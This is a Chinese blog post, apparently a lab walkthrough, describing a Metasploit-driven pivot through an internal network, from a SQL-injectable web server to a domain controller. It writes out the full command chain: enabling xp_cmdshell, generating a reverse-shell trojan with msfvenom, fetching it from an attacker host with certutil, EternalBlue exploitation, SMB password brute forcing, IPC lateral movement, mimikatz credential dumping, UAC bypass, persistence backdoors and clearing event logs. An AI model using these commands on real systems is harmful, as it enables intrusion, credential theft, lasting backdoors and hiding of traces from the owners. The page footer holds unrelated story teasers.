Metasploit-纵深域控

本文作者: 重生信安 - 鲨鱼

                        实验拓扑图

                    0x02 入侵1号机

1号机模拟外网web应用,找到注入点

判断为整形盲注,直接sqlmap跑一下权限.

Sqlserver 2008数据库sa权限,2008数据库默认禁用xp_cmdshell,需要手动开启。

EXEC sp_configure 'show advanced options',1//允许修改高级参数

RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1  //打开xp_cmdshell扩展

RECONFIGURE

开启后直接从注入点利用xp_cmdshell,执行系统命令添加账户等操作。我这里选择远程下载木马,运行木马对系统进行控制。生成木马并把木马放在192.168.31.135 web上提供下载。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.45 lport=4444 -f exe > /home/1.exe //生成msf木马文件

certutil -urlcache -split -f http://192.168.31.135/test.exe c:\1.exe //远程下载木马程序

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 本机ip

set lport 本机监听端口

run

再通过xp_cmdshell执行木马。

接收到shell,getuid 查看当前用户权限,shell  进入交互式shell,目标不在此主机,继续进行纵深。

background //挂起会话

route add 目标网段 子掩码  session号 //添加一条路由去往目标内网;

                      0x03 入侵2号机

通过路由转发对目标内网ms17-010漏洞主机进行探测。

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.192.1/24

set threads 50

Run

发现一台存在ms17-010 漏洞主机2号机,并设置exp进行攻击。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.31.45

set lport 6666

set rhosts 192.168.192.135

Run

通过远程溢出拿下2号机,添加用户开启3389,3389端口转发。

run getgui -e //开启3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.135//将192.135主机3389转发本机111

rdesktop -u 账号  -p 密码    本机ip:端口    // 远程连接

可以再添加一条路由继续进行扫描扩大战果。

                    0x04 入侵3号机

通过路由转发继续扫描脆弱主机,smb弱口令

use auxiliary/scanner/smb/smb_login

set rhosts 192.168.192.1/24

set user_file /home/1.txt

set pass_file /home/2.txt

set threads 50

Run

192.168.192.129 弱口令 administrator 123456,目标主机未开启3389,利用ipc入侵,回到2号机shell会话上 session -i 2 shell进入交互会话。

net use \\192.168.192.129 "123456" /user:"administrator" //建立ipc连接

copy c:\\1.exe \\192.168.192.129\c$    //将本地c盘1.exe 拷贝到目标c盘

net time \\192.168.192.129    //查看目标时间

at \\192.168.192.129 23:59 c:\\1.exe  // 根据时间添加事件,时间一到执行木马

kali设置好监听等待木马执行,反弹shell。

                    0x05 入侵4号机

利用3号机反弹的shell进行arp嗅探。

load sniffer //加载嗅探模板

sniffer_interfaces //列出主机网卡

sniffer_start [数值]  //开启监听

sniffer_dump 2 1.cap //导出监听到的数据为1.cap

用户登陆ftp,会被嗅探到明文密码。

解cap嗅探包。

use auxiliary/sniffer/psnuffle

set pcapfile 1.cap

run

得到ftp明文木马,然后远程到一台主机通过ftp上传webshell 大马。

进入大马,找到可读写目录上传木马。

kali设置好监听等待木马执行。

执行并接收,权限很低利用getsystem提权失败。

进入shell,systeminfo命令查看已打的补丁,发现可以用ms15-051进行提权。

search ms15 // 搜索ms15

额。。。。。好像提权失败了,换思路先绕过UAC.

use exploit/windows/local/bypassuac

set session 4

Run

返回一个新的shell,进入返回的新shell,直接getsystem进行提权。

提权成功,接下来读取明文密码。

run hashdump //读取用户密码hash

读取失败了,但是不要着急我们把shell注入到一个实体system进程中。

ps  //查看所有进程

migrate 1076  //将shell迁移到 1076 线程当中

load mimikatz  //加载mimikatz

msv  //读取用户明文(hash)

拿到域管理用户hash密码,去破解一下。

              0x06 拿下域控制器5号机

有了域控账户密码可以在域里面畅通无阻,继续用ipc拿下域控制器。

利用域管理员账号密码进行ipc入侵,kali设置监听得到反弹shell。

run getgui -e //开启3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.132

rdesktop -u administrator@guguyu.com -p P@ssw0rd 192.168.2.68:1111

成功拿下域控制器!

run persistence -X -i 5 -p 4444 -r 192.168.192.132 //向注册表写入后门文件 开机自启 每5秒反弹一次shell

run metsvc //在主机上创建一个监听31337端口的后门服务

clearev 清理痕迹。

不足之处,还请各位大佬多多指点!!!!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,723评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,485评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,998评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,323评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,355评论 5 374
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,079评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,389评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,019评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,519评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,971评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,100评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,738评论 4 324
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,293评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,289评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,517评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,547评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,834评论 2 345

推荐阅读更多精彩内容

  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小明yz阅读 2,751评论 0 8
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 5,135评论 0 11
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小沐子_IT阅读 2,052评论 0 4
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    Littleston阅读 3,314评论 0 12
  • 一、命令行 1. calc-----------启动计算器 2.certmgr.msc----证书管理实用程序 3...
    小小辛_c阅读 699评论 0 2